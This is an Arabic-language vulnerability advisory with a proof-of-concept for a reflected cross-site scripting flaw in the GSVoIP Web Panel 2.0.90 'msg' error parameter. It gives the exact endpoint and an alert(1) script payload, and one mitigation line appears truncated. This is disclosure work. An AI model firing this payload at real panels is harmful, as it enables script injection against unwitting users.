
Reflected XSS proof-of-concept لـ CVE-2025-69606 في GSVoIP Web Panel الإصدار 2.0.90. يوضح تنفيذ جافا سكريبت عن بعد غير مصادق عبر المعامل غير المنقى `msg`.
الخطورة: متوسطة | CWE: CWE-79 | مطلوب مصادقة: لا | ناقل الهجوم: عن بُعد
تم اكتشاف ثغرة Cross-Site Scripting (XSS) منعكسة في لوحة ويب GSVoIP (الإصدار v2.0.90). معامل msg الخاص بنقطة الخطأ لا يقوم بتعقيم الإدخال الذي يتحكم به المستخدم قبل عكسه في استجابة HTML، مما يسمح بتنفيذ جافا سكريبت عشوائي في متصفح الضحية.
| الحقل | التفاصيل |
|---|---|
| المنتج | لوحة ويب GSVoIP |
| الإصدار | 2.0.90 (على الأرجح إصدارات أقدم) |
| البائع | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Cross-Site Scripting |
| ناقل الهجوم | عن بُعد / شبكة |
| المصادقة | غير مطلوبة |
GET /painel/gateways.php/error?msg=<حمولة>
يتم عكس معامل msg مباشرة في استجابة HTML دون تعقيم أو ترميز للمخرجات.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
مفكوك الترميز:
<script>alert(1)</script>
عند الوصول إلى عنوان URL المُعد، يتم تنفيذ الحمولة المحقونة في متصفح الضحية:
alert(1)
msg.script-src مقيدة.| الخطوة | الحدث |
|---|---|
| 1 | تم اكتشاف الثغرة والإبلاغ عنها من قبل لويز إدواردو |
| 2 | تم تعيين CVE: CVE-2025-69606 |
| 3 | الإفصاح العام |
تم اكتشاف الثغرة والإبلاغ عنها من قبل لويز إدواردو
CVE-2025-69606 · CWE-79 · لوحة ويب GSVoIP v2.0.90